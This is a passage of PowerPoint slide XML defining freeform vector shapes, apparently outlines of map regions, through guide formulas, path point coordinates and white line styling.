                  <a:gd name="T65" fmla="*/ 5 h 244"/>
                  <a:gd name="T66" fmla="*/ 237 w 267"/>
                  <a:gd name="T67" fmla="*/ 19 h 244"/>
                  <a:gd name="T68" fmla="*/ 246 w 267"/>
                  <a:gd name="T69" fmla="*/ 22 h 244"/>
                  <a:gd name="T70" fmla="*/ 254 w 267"/>
                  <a:gd name="T71" fmla="*/ 28 h 244"/>
                  <a:gd name="T72" fmla="*/ 265 w 267"/>
                  <a:gd name="T73" fmla="*/ 32 h 244"/>
                  <a:gd name="T74" fmla="*/ 256 w 267"/>
                  <a:gd name="T75" fmla="*/ 45 h 244"/>
                  <a:gd name="T76" fmla="*/ 246 w 267"/>
                  <a:gd name="T77" fmla="*/ 45 h 244"/>
                  <a:gd name="T78" fmla="*/ 231 w 267"/>
                  <a:gd name="T79" fmla="*/ 47 h 244"/>
                  <a:gd name="T80" fmla="*/ 206 w 267"/>
                  <a:gd name="T81" fmla="*/ 51 h 244"/>
                  <a:gd name="T82" fmla="*/ 208 w 267"/>
                  <a:gd name="T83" fmla="*/ 56 h 244"/>
                  <a:gd name="T84" fmla="*/ 210 w 267"/>
                  <a:gd name="T85" fmla="*/ 62 h 244"/>
                  <a:gd name="T86" fmla="*/ 210 w 267"/>
                  <a:gd name="T87" fmla="*/ 73 h 244"/>
                  <a:gd name="T88" fmla="*/ 220 w 267"/>
                  <a:gd name="T89" fmla="*/ 82 h 244"/>
                  <a:gd name="T90" fmla="*/ 231 w 267"/>
                  <a:gd name="T91" fmla="*/ 90 h 244"/>
                  <a:gd name="T92" fmla="*/ 221 w 267"/>
                  <a:gd name="T93" fmla="*/ 98 h 244"/>
                  <a:gd name="T94" fmla="*/ 218 w 267"/>
                  <a:gd name="T95" fmla="*/ 114 h 244"/>
                  <a:gd name="T96" fmla="*/ 202 w 267"/>
                  <a:gd name="T97" fmla="*/ 133 h 244"/>
                  <a:gd name="T98" fmla="*/ 183 w 267"/>
                  <a:gd name="T99" fmla="*/ 155 h 244"/>
                  <a:gd name="T100" fmla="*/ 176 w 267"/>
                  <a:gd name="T101" fmla="*/ 170 h 244"/>
                  <a:gd name="T102" fmla="*/ 156 w 267"/>
                  <a:gd name="T103" fmla="*/ 174 h 244"/>
                  <a:gd name="T104" fmla="*/ 147 w 267"/>
                  <a:gd name="T105" fmla="*/ 173 h 244"/>
                  <a:gd name="T106" fmla="*/ 137 w 267"/>
                  <a:gd name="T107" fmla="*/ 190 h 244"/>
                  <a:gd name="T108" fmla="*/ 149 w 267"/>
                  <a:gd name="T109" fmla="*/ 195 h 244"/>
                  <a:gd name="T110" fmla="*/ 152 w 267"/>
                  <a:gd name="T111" fmla="*/ 211 h 244"/>
                  <a:gd name="T112" fmla="*/ 163 w 267"/>
                  <a:gd name="T113" fmla="*/ 228 h 244"/>
                  <a:gd name="T114" fmla="*/ 159 w 267"/>
                  <a:gd name="T115" fmla="*/ 235 h 244"/>
                  <a:gd name="T116" fmla="*/ 148 w 267"/>
                  <a:gd name="T117" fmla="*/ 235 h 244"/>
                  <a:gd name="T118" fmla="*/ 133 w 267"/>
                  <a:gd name="T119" fmla="*/ 235 h 244"/>
                  <a:gd name="T120" fmla="*/ 120 w 267"/>
                  <a:gd name="T121" fmla="*/ 240 h 244"/>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67"/>
                  <a:gd name="T184" fmla="*/ 0 h 244"/>
                  <a:gd name="T185" fmla="*/ 267 w 267"/>
                  <a:gd name="T186" fmla="*/ 244 h 244"/>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67" h="244">
                    <a:moveTo>
                      <a:pt x="115" y="244"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="109" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="206" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="239" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="239" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="239" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="246" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="250" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="265" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="246" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="206" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="207" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="213" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="213" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="219" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="207" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="206" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="244"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36358" name="Freeform 90"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3141" y="3194"/>
                <a:ext cx="123" cy="116"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 80 w 123"/>
                  <a:gd name="T1" fmla="*/ 2 h 116"/>
                  <a:gd name="T2" fmla="*/ 82 w 123"/>
                  <a:gd name="T3" fmla="*/ 7 h 116"/>
                  <a:gd name="T4" fmla="*/ 96 w 123"/>
                  <a:gd name="T5" fmla="*/ 9 h 116"/>
                  <a:gd name="T6" fmla="*/ 113 w 123"/>
                  <a:gd name="T7" fmla="*/ 15 h 116"/>
                  <a:gd name="T8" fmla="*/ 119 w 123"/>
                  <a:gd name="T9" fmla="*/ 19 h 116"/>
                  <a:gd name="T10" fmla="*/ 121 w 123"/>
                  <a:gd name="T11" fmla="*/ 31 h 116"/>
                  <a:gd name="T12" fmla="*/ 122 w 123"/>
                  <a:gd name="T13" fmla="*/ 46 h 116"/>
                  <a:gd name="T14" fmla="*/ 118 w 123"/>
                  <a:gd name="T15" fmla="*/ 53 h 116"/>
                  <a:gd name="T16" fmla="*/ 118 w 123"/>
                  <a:gd name="T17" fmla="*/ 59 h 116"/>
                  <a:gd name="T18" fmla="*/ 123 w 123"/>
                  <a:gd name="T19" fmla="*/ 72 h 116"/>
                  <a:gd name="T20" fmla="*/ 120 w 123"/>
                  <a:gd name="T21" fmla="*/ 77 h 116"/>
                  <a:gd name="T22" fmla="*/ 113 w 123"/>
                  <a:gd name="T23" fmla="*/ 86 h 116"/>
                  <a:gd name="T24" fmla="*/ 113 w 123"/>
                  <a:gd name="T25" fmla="*/ 95 h 116"/>
                  <a:gd name="T26" fmla="*/ 101 w 123"/>
                  <a:gd name="T27" fmla="*/ 110 h 116"/>
                  <a:gd name="T28" fmla="*/ 94 w 123"/>
                  <a:gd name="T29" fmla="*/ 116 h 116"/>
                  <a:gd name="T30" fmla="*/ 88 w 123"/>
                  <a:gd name="T31" fmla="*/ 114 h 116"/>
                  <a:gd name="T32" fmla="*/ 81 w 123"/>
                  <a:gd name="T33" fmla="*/ 115 h 116"/>
                  <a:gd name="T34" fmla="*/ 72 w 123"/>
                  <a:gd name="T35" fmla="*/ 112 h 116"/>
                  <a:gd name="T36" fmla="*/ 62 w 123"/>
                  <a:gd name="T37" fmla="*/ 110 h 116"/>
                  <a:gd name="T38" fmla="*/ 60 w 123"/>
                  <a:gd name="T39" fmla="*/ 109 h 116"/>
                  <a:gd name="T40" fmla="*/ 55 w 123"/>
                  <a:gd name="T41" fmla="*/ 103 h 116"/>
                  <a:gd name="T42" fmla="*/ 44 w 123"/>
                  <a:gd name="T43" fmla="*/ 101 h 116"/>
                  <a:gd name="T44" fmla="*/ 38 w 123"/>
                  <a:gd name="T45" fmla="*/ 93 h 116"/>
                  <a:gd name="T46" fmla="*/ 37 w 123"/>
                  <a:gd name="T47" fmla="*/ 84 h 116"/>
                  <a:gd name="T48" fmla="*/ 31 w 123"/>
                  <a:gd name="T49" fmla="*/ 83 h 116"/>
                  <a:gd name="T50" fmla="*/ 28 w 123"/>
                  <a:gd name="T51" fmla="*/ 80 h 116"/>
                  <a:gd name="T52" fmla="*/ 28 w 123"/>
                  <a:gd name="T53" fmla="*/ 75 h 116"/>
                  <a:gd name="T54" fmla="*/ 20 w 123"/>
                  <a:gd name="T55" fmla="*/ 71 h 116"/>
                  <a:gd name="T56" fmla="*/ 12 w 123"/>
                  <a:gd name="T57" fmla="*/ 65 h 116"/>
                  <a:gd name="T58" fmla="*/ 8 w 123"/>
                  <a:gd name="T59" fmla="*/ 53 h 116"/>
                  <a:gd name="T60" fmla="*/ 1 w 123"/>
                  <a:gd name="T61" fmla="*/ 45 h 116"/>
                  <a:gd name="T62" fmla="*/ 0 w 123"/>
                  <a:gd name="T63" fmla="*/ 40 h 116"/>
                  <a:gd name="T64" fmla="*/ 7 w 123"/>
                  <a:gd name="T65" fmla="*/ 41 h 116"/>
                  <a:gd name="T66" fmla="*/ 13 w 123"/>
                  <a:gd name="T67" fmla="*/ 38 h 116"/>
                  <a:gd name="T68" fmla="*/ 22 w 123"/>
                  <a:gd name="T69" fmla="*/ 42 h 116"/>
                  <a:gd name="T70" fmla="*/ 31 w 123"/>
                  <a:gd name="T71" fmla="*/ 34 h 116"/>
                  <a:gd name="T72" fmla="*/ 40 w 123"/>
                  <a:gd name="T73" fmla="*/ 22 h 116"/>
                  <a:gd name="T74" fmla="*/ 47 w 123"/>
                  <a:gd name="T75" fmla="*/ 18 h 116"/>
                  <a:gd name="T76" fmla="*/ 56 w 123"/>
                  <a:gd name="T77" fmla="*/ 16 h 116"/>
                  <a:gd name="T78" fmla="*/ 57 w 123"/>
                  <a:gd name="T79" fmla="*/ 10 h 116"/>
                  <a:gd name="T80" fmla="*/ 64 w 123"/>
                  <a:gd name="T81" fmla="*/ 2 h 116"/>
                  <a:gd name="T82" fmla="*/ 77 w 123"/>
                  <a:gd name="T83" fmla="*/ 0 h 11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123"/>
                  <a:gd name="T127" fmla="*/ 0 h 116"/>
                  <a:gd name="T128" fmla="*/ 123 w 123"/>
                  <a:gd name="T129" fmla="*/ 116 h 11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123" h="116">
                    <a:moveTo>
                      <a:pt x="80" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="80" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="25"/>
